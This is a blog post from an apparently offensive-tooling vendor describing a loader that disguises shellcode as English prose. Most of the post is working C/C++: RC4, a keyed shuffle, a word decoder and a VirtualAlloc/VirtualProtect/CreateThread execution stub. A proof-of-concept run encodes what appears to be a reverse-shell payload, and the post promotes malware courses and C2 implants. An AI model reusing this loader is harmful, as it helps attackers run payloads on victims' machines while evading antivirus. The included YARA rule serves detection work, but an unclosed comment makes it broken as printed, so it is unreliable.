June 9, 2026
Word Based Shellcode Encoding
S12 - 0x12Dark Development
Welcome to a new Medium post. Today, I'd like to share an interesting technique that allows shellcode to be encoded as a sequence of English words. Similar to the classic shellcode-to-IPv4 encoding approach, this method transforms shellcode into natural English text instead of relying on IP address representations. The result is a more human-readable format.
This idea comes from a user on our Discord server who wrote the code covered in this post. Here is the GitHub repo:
https://github.com/NirvanaOn/NOW
There are also several other repos doing similar things:
https://github.com/tehstoni/LexiCrypt
https://github.com/wsummerhill/DictionShellcode
Courses: Learn how offensive development works on Windows OS from beginner to advanced taking our courses, all explained in C++.
All Courses Learn how real Windows offensive development works
Technique Database: Access 70+ real offensive techniques with weekly updates, complete with code, PoCs, and AV scan results:
Malware Techniques Database Explore an ever-growing collection of techniques
Modules: Dive deep into essential offensive topics with our modular text-training program! Get a new module every 14 days. Start at just $1.99 per module, or unlock lifetime access to all modules for $100.
0x12 Dark Development Learn the best offensive techniques for Windows OS, with content ranging from beginner to advanced levels. All…
Methodology
To turn raw shellcode bytes into natural-looking English text (and recover them later) we follow five logical steps. Understanding these steps first makes the code much easier to read.
- Build the 256-word codebook: We need exactly 256 unique words, one for each possible byte value (0x00–0xFF). The user provides a secret sentence, and we extract its unique words. If there are fewer than 256, we pad the list with common English words from a hardcoded pool. The sentence acts as a key: two operators with different sentences produce completely different codebooks.
- Shuffle the codebook with a stream cipher (RC4 or AES-256-CTR): A deterministic shuffle is applied using a password as the cipher key. This maps each position in the word list to a specific byte value in a scrambled order. Without the password, you cannot reconstruct which word maps to which byte. The result is stored in g_shuffled_opcodes[256].
- Encode (replace each shellcode byte with its codeword): We iterate over the shellcode. For each byte value b, we look up g_byte_to_word[b] and emit the corresponding word. Optionally, connector words (adverbs like however or meanwhile) are injected between codewords to make the output read more naturally.
- Decode (map words back to bytes): On the decoder side, we tokenize the ciphertext and strip punctuation. For each clean token, we perform a reverse lookup in the codebook (g_lookup_words / g_lookup_bytes) to recover its byte value; tokens that are not codewords, such as the connectors, are skipped.
- Execute the decoded shellcode in memory: We allocate a RW buffer with VirtualAlloc, copy the decoded bytes into it, flip the permissions to PAGE_EXECUTE_READ with VirtualProtect, then start a thread via CreateThread.
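The first step, building the codebook, can be sketched in a few lines of standard C++. This is a hedged illustration rather than NØW's code: `for_each_word`, `build_codebook`, and the padding pool passed in are hypothetical, and the sketch assumes words are lowercased and split on any non-letter character (NØW's own tokenization may differ in edge cases such as apostrophes).

```cpp
#include <cassert>
#include <cctype>
#include <cstddef>
#include <string>
#include <unordered_set>
#include <vector>

// Split text on every non-letter and hand each lowercase word to emit().
template <typename Fn>
void for_each_word(const std::string& text, Fn emit) {
    std::string cur;
    for (unsigned char c : text) {
        if (std::isalpha(c)) {
            cur.push_back(static_cast<char>(std::tolower(c)));
        } else if (!cur.empty()) {
            emit(cur);
            cur.clear();
        }
    }
    if (!cur.empty()) emit(cur);
}

// Unique words from the secret sentence (first occurrence wins), then padding
// words from `pool` until `target` entries exist. The result can be shorter
// than `target` if the pool runs out, so a caller should check its size.
std::vector<std::string> build_codebook(const std::string& sentence,
                                        const std::vector<std::string>& pool,
                                        std::size_t target = 256) {
    std::vector<std::string> words;
    std::unordered_set<std::string> seen;
    auto add = [&](const std::string& w) {
        if (words.size() < target && seen.insert(w).second) words.push_back(w);
    };
    for_each_word(sentence, add);
    for (const std::string& p : pool) for_each_word(p, add);
    return words;
}
```

For example, `build_codebook("The old lighthouse keeper, the old sea.", {"apple", "The", "river", "stone"}, 7)` yields the, old, lighthouse, keeper, sea, apple, river: repeated words are dropped and padding stops as soon as the target size is reached.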
Implementation
The test file NØW (RC4 - Test).cpp is a self-contained C++ loader. It hardcodes the secret sentence, password, and ciphertext, then decodes and executes the shellcode. Let's break down its most important parts.
RC4 implementation
NØW ships its own RC4 implementation, so there is no external crypto dependency. The implementation follows the standard KSA (Key Scheduling Algorithm) and PRGA (Pseudo-Random Generation Algorithm).
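A hand-rolled RC4 is easy to get subtly wrong, so it is worth checking any port against published test vectors. The sketch below restates the same KSA/PRGA logic as NØW's rc4_init() and rc4_byte() in a small C++ class; `Rc4` and `rc4_xor` are illustrative names, not part of NØW. With key "Key" and plaintext "Plaintext", the widely published RC4 vector gives BB F3 16 E8 D9 40 AF 0A D3.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <string>
#include <utility>
#include <vector>

// Illustrative RC4 mirroring rc4_init() (KSA) and rc4_byte() (PRGA).
class Rc4 {
public:
    // key_len must be > 0, as in the original (key[i % key_len]).
    Rc4(const std::uint8_t* key, std::size_t key_len) {
        for (int k = 0; k < 256; ++k) s_[k] = static_cast<std::uint8_t>(k);
        int j = 0;
        for (int k = 0; k < 256; ++k) {  // KSA: mix the key into the permutation
            j = (j + s_[k] + key[k % key_len]) & 0xFF;
            std::swap(s_[k], s_[j]);
        }
    }
    std::uint8_t next() {  // PRGA: produce one keystream byte
        i_ = (i_ + 1) & 0xFF;
        j_ = (j_ + s_[i_]) & 0xFF;
        std::swap(s_[i_], s_[j_]);
        return s_[(s_[i_] + s_[j_]) & 0xFF];
    }
private:
    std::uint8_t s_[256];
    int i_ = 0;
    int j_ = 0;
};

// XOR data with the keystream; RC4 encryption and decryption are the same operation.
std::vector<std::uint8_t> rc4_xor(const std::string& key, const std::string& data) {
    Rc4 rc4(reinterpret_cast<const std::uint8_t*>(key.data()), key.size());
    std::vector<std::uint8_t> out;
    out.reserve(data.size());
    for (unsigned char c : data) out.push_back(static_cast<std::uint8_t>(c ^ rc4.next()));
    return out;
}
```

If a port disagrees with these vectors, the keystream it feeds into the codebook shuffle will differ too, and the resulting word mapping will not match an encoder built on standard RC4.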
typedef struct {
unsigned char S[256]; /* 256-byte permutation state */
int i, j;             /* PRGA indices */
} RC4_State;
/* KSA: start from the identity permutation and mix in the key (key_len must be > 0) */
static void rc4_init(RC4_State* rc4, const unsigned char* key, size_t key_len) {
for (int i = 0; i < 256; i++) rc4->S[i] = (unsigned char)i;
int j = 0;
for (int i = 0; i < 256; i++) {
j = (j + rc4->S[i] + key[i % key_len]) % 256;
unsigned char t = rc4->S[i]; /* swap S[i] and S[j] */
rc4->S[i] = rc4->S[j];
rc4->S[j] = t;
}
rc4->i = rc4->j = 0;
}
/* PRGA: advance i and j, swap S[i] and S[j], and return one keystream byte */
static unsigned char rc4_byte(RC4_State* rc4) {
rc4->i = (rc4->i + 1) & 0xFF;
rc4->j = (rc4->j + rc4->S[rc4->i]) & 0xFF;
unsigned char t = rc4->S[rc4->i];
rc4->S[rc4->i] = rc4->S[rc4->j];
rc4->S[rc4->j] = t;
return rc4->S[(rc4->S[rc4->i] + rc4->S[rc4->j]) & 0xFF];
}
Building the codebook
init_word_mapping() is the setup function that ties everything together. It extracts unique words from the secret sentence, pads the list to 256 words, runs the RC4 shuffle to produce the scrambled byte order, then builds both the encode map (g_byte_to_word) and the reverse decode map (g_lookup_words / g_lookup_bytes).
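The shuffle and the two maps can also be exercised in isolation. The sketch below is a self-contained C++ port of the idea behind generate_shuffled_opcodes() and create_byte_to_word_map(); `Rc4`, `shuffled_opcodes`, `Codebook`, and `make_codebook` are hypothetical names, and the std::unordered_map reverse index is an assumption (NØW uses the g_lookup_words / g_lookup_bytes arrays). Note that `ks % (i + 1)` carries a small modulo bias because a keystream byte ranges over 0..255, which is not always a multiple of i + 1; that does not affect correctness here, since encoder and decoder derive the same permutation from the same password.

```cpp
#include <array>
#include <cassert>
#include <cstdint>
#include <string>
#include <unordered_map>
#include <utility>
#include <vector>

// Minimal RC4 keystream, same KSA/PRGA as rc4_init()/rc4_byte() (key must be non-empty).
struct Rc4 {
    std::array<std::uint8_t, 256> s{};
    int i = 0, j = 0;
    explicit Rc4(const std::string& key) {
        for (int k = 0; k < 256; ++k) s[k] = static_cast<std::uint8_t>(k);
        int jj = 0;
        for (int k = 0; k < 256; ++k) {
            jj = (jj + s[k] + static_cast<std::uint8_t>(key[k % key.size()])) & 0xFF;
            std::swap(s[k], s[jj]);
        }
    }
    std::uint8_t next() {
        i = (i + 1) & 0xFF;
        j = (j + s[i]) & 0xFF;
        std::swap(s[i], s[j]);
        return s[(s[i] + s[j]) & 0xFF];
    }
};

// Keyed Fisher-Yates shuffle of 0..255, mirroring generate_shuffled_opcodes().
std::array<std::uint8_t, 256> shuffled_opcodes(const std::string& password) {
    std::array<std::uint8_t, 256> p{};
    for (int k = 0; k < 256; ++k) p[k] = static_cast<std::uint8_t>(k);
    Rc4 rc4(password);
    for (int k = 255; k > 0; --k) {
        int j = rc4.next() % (k + 1);  // small modulo bias, but deterministic
        std::swap(p[k], p[j]);
    }
    return p;
}

// Hypothetical container holding both directions of the mapping.
struct Codebook {
    std::array<std::string, 256> byte_to_word;                   // encode map
    std::unordered_map<std::string, std::uint8_t> word_to_byte;  // decode map
};

// The word at position pos is assigned byte p[pos]; words must hold 256 unique entries.
Codebook make_codebook(const std::vector<std::string>& words, const std::string& password) {
    const auto p = shuffled_opcodes(password);
    Codebook cb;
    for (int pos = 0; pos < 256; ++pos) {
        cb.byte_to_word[p[pos]] = words[pos];
        cb.word_to_byte[words[pos]] = p[pos];
    }
    return cb;
}
```

Because the shuffle only swaps elements, the output is always a permutation of 0..255, so every byte value gets exactly one word and the decode map is a true inverse of the encode map. Calling shuffled_opcodes() twice with the same password returns the same permutation, which is what lets the decoder rebuild the codebook on its own.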
static void generate_shuffled_opcodes(const char* password) {
for (int i = 0; i < 256; i++) g_shuffled_opcodes[i] = (unsigned char)i;
RC4_State rc4;
rc4_init(&rc4, (const unsigned char*)password, strlen(password));
/* Fisher-Yates shuffle driven by the RC4 keystream */
for (int i = 255; i > 0; i--) {
unsigned char ks = rc4_byte(&rc4);
int j = ks % (i + 1);
unsigned char t = g_shuffled_opcodes[i];
g_shuffled_opcodes[i] = g_shuffled_opcodes[j];
g_shuffled_opcodes[j] = t;
}
}
static void create_byte_to_word_map(void) {
for (int pos = 0; pos < 256; pos++) {
unsigned char b = g_shuffled_opcodes[pos];
g_byte_to_word[b] = g_words[pos]; /* byte value → codeword */
}
}
Decoder
decrypt_shellcode() tokenizes the ciphertext using a broad separator set that includes punctuation and whitespace. Each clean token is checked against the reverse lookup. Noise words (connectors not in the codebook) are silently skipped.
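NØW's decoder relies on helpers such as clean_alpha_token() and lookup_codeword(), whose bodies are not reproduced in this post. The sketch below shows one possible shape for the encode/decode pair, under stated assumptions: the reverse index is a std::unordered_map (NØW uses the g_lookup_words / g_lookup_bytes arrays), tokens are split on every non-letter instead of on TOKEN_SEP, and `ReverseMap`, `encode_words`, and `decode_words` are hypothetical names. Unknown tokens are counted as noise, matching the connector-skipping behavior described above.

```cpp
#include <cassert>
#include <cctype>
#include <cstddef>
#include <cstdint>
#include <string>
#include <unordered_map>
#include <vector>

// Hypothetical reverse index: codeword -> byte value.
using ReverseMap = std::unordered_map<std::string, std::uint8_t>;

// Encode: one codeword per byte, space-separated (no connector words).
std::string encode_words(const std::vector<std::uint8_t>& data,
                         const std::vector<std::string>& byte_to_word) {
    std::string out;
    for (std::uint8_t b : data) {
        if (!out.empty()) out += ' ';
        out += byte_to_word[b];
    }
    return out;
}

// Decode: split on anything that is not a letter, lowercase each token,
// emit the byte for known codewords, and count unknown tokens as noise.
std::vector<std::uint8_t> decode_words(const std::string& text, const ReverseMap& rev,
                                       std::size_t* noise_skipped = nullptr) {
    std::vector<std::uint8_t> out;
    std::size_t noise = 0;
    std::string tok;
    auto flush = [&]() {
        if (tok.empty()) return;
        auto it = rev.find(tok);
        if (it != rev.end()) out.push_back(it->second);
        else ++noise;  // connector or other non-codeword
        tok.clear();
    };
    for (unsigned char c : text) {
        if (std::isalpha(c)) tok.push_back(static_cast<char>(std::tolower(c)));
        else flush();
    }
    flush();
    if (noise_skipped) *noise_skipped = noise;
    return out;
}
```

With a toy codebook of two-letter words ("aa" for 0x00 through "pp" for 0xFF), the bytes 0x48 0x69 encode to "ei gj", and a decorated sentence such as "Ei, however GJ!" still decodes to the same two bytes, with one noise token skipped.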
static size_t decrypt_shellcode(const char* text, unsigned char** output,
int verbose, DecryptStats* stats) {
/* *output must already point to a buffer with room for one byte per token */
char* copy = duplicate_string(text); /* strtok modifies its input, so work on a copy */
if (!copy) return 0;
size_t out_pos = 0;
char* tok = strtok(copy, TOKEN_SEP); /* TOKEN_SEP = " \t\n\r,.;:!?()[]{}\"'-" */
while (tok) {
char clean[MAX_WORD_LEN];
clean_alpha_token(tok, clean, sizeof(clean)); /* lowercase, strip non alpha */
unsigned char byte_val;
if (lookup_codeword(clean, &byte_val)) {
(*output)[out_pos++] = byte_val; /* codeword matched, emit byte */
} else {
stats->noise_skipped++; /* connector word, silently ignore */
}
tok = strtok(NULL, TOKEN_SEP);
}
free(copy); /* release the working copy (assumes duplicate_string() uses malloc) */
stats->bytes_out = out_pos;
return out_pos;
}
Memory allocation and execution
Once the byte array is reconstructed, execution uses the classic two-step RW to RX pattern: allocate with PAGE_READWRITE, copy the bytes, flip to PAGE_EXECUTE_READ with VirtualProtect, then spawn a thread. This stage is just one option; the encoding itself does not depend on how the decoded bytes are run.
void* exec_mem = VirtualAlloc(NULL, decoded_len,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE);
memcpy(exec_mem, decoded, decoded_len);
DWORD old_protect = 0;
VirtualProtect(exec_mem, decoded_len, PAGE_EXECUTE_READ, &old_protect);
HANDLE thread = CreateThread(NULL, 0,
(LPTHREAD_START_ROUTINE)exec_mem,
NULL, 0, NULL);
WaitForSingleObject(thread, 5000);
CloseHandle(thread);
Code
All the source code can be found on their repo:
https://github.com/NirvanaOn/NOW
Proof of Concept
Main menu:
1. Encrypt shellcode -> words
2. Decrypt words -> shellcode
3. Help
4. Exit
Select [1-4]: 1
--- ENCRYPT SHELLCODE TO WORDS ---
Secret sentence (paste text, blank line twice to finish):
> The old lighthouse keeper had not seen another human face in over seven years, not since the strange fog rolled in from the sea and never left. Every morning he climbed the spiral staircase with a bucket of oil and a prayer on his lips, polishing the great lens until it shone like a dying star. The birds had stopped coming long ago, and the fish had vanished from the waters below, leaving only silence and the constant moan of waves against broken stone. One night he found a bottle washed up on the rocky shore, sealed with red wax and containing a map drawn on leather. The map showed an island that did not exist, marked with a single word written in faded ink: Eden. He laughed at first, thinking it was a prank or a ghost story, but something in his chest ached with a hope he had buried years ago. So he packed a bag with dried meat, fresh water, a compass that spun in circles, and the old revolver his father had used in the war. He stepped into a rowboat as the sun bled orange and purple across the horizon, pushing off without looking back. The fog swallowed him whole, and for three days he saw nothing but gray mist and his own trembling hands. On the fourth morning he woke to the sound of bells ringing softly in the distance, and the air smelled of honey and rain. Before him stood a forest where the trees had silver leaves and the grass sparkled like broken glass. A path of white stones led into the shadows, and at the end of that path waited something he could not name but had always known. He whispered a prayer to no god in particular, took a deep breath, and stepped forward into the impossible.
Password (min 4 chars): 1234
Stream cipher for byte shuffle (must match on decrypt):
1 = RC4 (RC4ENC / RC4DEC compatible)
2 = AES-256-CTR (AESENC / AESDEC compatible, Windows)
Choice [1]: 1
Stream: RC4 | Word pool: 256 | Safe connectors: 50
Output style:
0 = Plain words only (RC4ENC/RC4DEC compatible)
1 = Natural prose (light) - longer sentences, fewer fillers
2 = Natural prose (medium) - balanced paragraphs [default]
3 = Natural prose (heavy) - more connectors and breaks
Choice [2]: 2
Shellcode input: 1=Hex 2=Binary .bin
Choice [1]: 2
Path to .bin: rvshell.bin
Input shellcode: 324 bytes
[+] Round-trip self-test passed (324 bytes verified).
Output file [encrypted_words.txt]: encrypted_words.txt
[+] Saved: encrypted_words.txt (2899 chars)
[+] Format: natural prose (level 2)
--- PREVIEW ---
Or off perhaps first how, similarly how previously, consequently how good swallowed use, led specifically deep. Something now two, likewise this now what elsewhere leaves now, chiefly what! Moreover, rolled now ached stepped work specifically over, silence great meanwhile led see, however with. Therefore, birds hope star revolver that, up indeed broken i?
Well bells nowhere bucket, vanished your what regardless waited now, nevertheless what across perhaps now silence, certainly birds. Additionally, now god so basically get specifically lighthouse three, anywhere bells make washed now did. Up bells meat now elsewhere any, nowhere took lighthouse about, similarly any now it, notably now bells woke led? See with differently broken, previously i well similarly bells bucket alternatively come...
We build custom C2 agents and implants for red teams, giving you full control in professional operations.
Custom Agents — 0x12 Dark Development Custom C2 Agents Built for the Real World. Command & Control agents compatible with Mythic, Havoc and leading…
Detection
0x12DarkSandbox
Test your own payloads against the same stack with a free scan on sign up, or go deeper with a scan pack or monthly plan.
Upload & Scan Upload malware samples for parallel analysis across isolated Windows VMs with multi-engine AV scanning
Because the .exe is interactive, we only run the static analysis scan here.
Capabilities
delay execution
create or open file
allocate memory
allocate or change RWX memory
create thread
change memory protection
allocate or change RW memory
contain loop
hash data via WinCrypt
initialize hashing via WinCrypt
read file on Windows
write file on Windows
spawn thread to RWX shellcode
execute shellcode via indirect call
get thread local storage value
enumerate PE sections
contain a thread local storage (.tls) section
Defense Evasion
create new key via CryptAcquireContext
encrypt or decrypt via WinCrypt
encrypt data using AES via WinAPI
Execution
parse PE header
YARA
Here is a YARA rule to detect this technique:
/*
Rule : WordShellcodeDecoder_Generic
Author : 0x12 Dark Development
Description:
Detects binary loaders that implement a word-based shellcode decoding scheme.
The technique maps English words to byte values through a 256-entry lookup
table, tokenizes a plaintext payload using punctuation/whitespace separators,
and reconstructs raw shellcode byte-by-byte from the token stream.
Rule is intentionally generic and does not target any specific tool.
Reference: https://github.com/NirvanaOn/NOW
https://github.com/tehstoni/LexiCrypt
https://github.com/wsummerhill/DictionShellcode
*/
rule WordShellcodeDecoder_Generic {
meta:
author = "0x12 Dark Development"
description = "Detects binary loaders using a word-to-byte mapping table to decode shellcode from natural language text"
category = "evasion, encoding, shellcode-delivery"
technique = "T1027.013 - Obfuscated Files or Information: Encrypted/Encoded File"
severity = "high"
date = "2025-08-01"
strings:
/*
* Separator sets used by tokenizers.
* The common denominator across all implementations is whitespace +
* the basic sentence punctuation set. We match several ordering variants.
*/
$sep_full = " \t\n\r,.;:!?()[]{}\"'-" ascii wide
$sep_min = " \t\n\r,.;:!?" ascii wide
$sep_ws_pun = " .,;:!?\t\n" ascii wide
/*
* Canonical RC4 KSA initialisation pattern (inline, not imported).
* Byte sequence: for(i=0;i<256;i++) S[i]=i
* Compiled as: xor eax,eax / mov [base+rax], al / inc eax / cmp eax,100h
 * This 12-byte sequence is highly characteristic and rarely a false positive.
*/
$rc4_ksa = { 31 C0 88 04 08 FF C0 3D 00 01 00 00 }
/*
* RC4 PRGA inner loop — swap + keystream output.
* Matches the two-swap + index add pattern regardless of register allocation.
*/
$rc4_prga = { 8A ?? ?? 86 ?? ?? 88 ?? ?? 03 ?? ?? 8A ?? ?? }
/*
* Fisher-Yates shuffle driven by a keystream byte.
* Pattern: ks % (i+1) followed by a swap of two array elements.
* Captured as: movzx + idiv/imul + xchg sequence (32-bit variant).
*/
$fy_shuffle = { 0F B6 ?? F7 ?? 8B ?? 87 ?? }
/*
* Byte accumulation loop pattern: result of lookup written into
* a growing output buffer indexed by a counter.
* mov [buf + counter], al (general form, tolerates base-reg variation)
*/
$accum_byte = { 88 04 ?? 48 FF C? }
/*
* isalpha / tolower pipeline — used to clean tokens before lookup.
* Nearly all implementations normalise tokens to lowercase alpha-only.
* Inline pattern: call isalpha followed closely by call tolower.
*/
$clean_tok = { FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 15 ?? ?? ?? ?? }
/*
* strtok import name — present in any MSVC/MinGW build that does
* not hand-roll the tokenizer.
*/
$strtok_imp = "strtok" ascii nocase
/*
* Padding pool — natural English words that appear in word-pool arrays.
 * Four or more of these appearing in the same binary is treated as a
 * signal of an embedded codebook (see the 4 of ($pool_w*) condition).
$pool_w1 = "however" ascii fullword
$pool_w2 = "therefore" ascii fullword
$pool_w3 = "moreover" ascii fullword
$pool_w4 = "furthermore" ascii fullword
$pool_w5 = "nevertheless" ascii fullword
$pool_w6 = "consequently" ascii fullword
$pool_w7 = "alternatively" ascii fullword
$pool_w8 = "additionally" ascii fullword
$pool_w9 = "particularly" ascii fullword
$pool_w10 = "subsequently" ascii fullword
condition:
/* PE or ELF binary */
(
uint16(0) == 0x5A4D /* MZ header */
or uint32(0) == 0x464C457F /* ELF header */
)
and filesize < 10MB
/* Core decoder fingerprint:
separator string + token accumulation + import or inline tokenizer */
and (
($sep_full or $sep_min or $sep_ws_pun)
and $accum_byte
and ($strtok_imp or $clean_tok)
)
/* Cipher layer — inline RC4 KSA or PRGA, or the Fisher-Yates shuffle */
and (
$rc4_ksa or $rc4_prga or $fy_shuffle
)
/* Codebook presence:
4 or more connector/padding words present anywhere in the binary
(the condition checks presence, not proximity). */
and (
4 of ($pool_w*)
)
}
Here you have my collection of YARA rules:
GitHub — S12cybersecurity/YaraRules: Collection of interesting Yara Rules Collection of interesting Yara Rules. Contribute to S12cybersecurity/YaraRules development by creating an account on…
Conclusions
Word-based shellcode encoding is a simple idea with real practical impact. It does not break cryptography or exploit kernel vulnerabilities; it just changes what the payload looks like at rest, and that is often enough to slip past a first layer of detection.
📌 Follow me: YouTube | 🐦 X | 💬 Discord Server | 📸 Instagram | Newsletter
S12.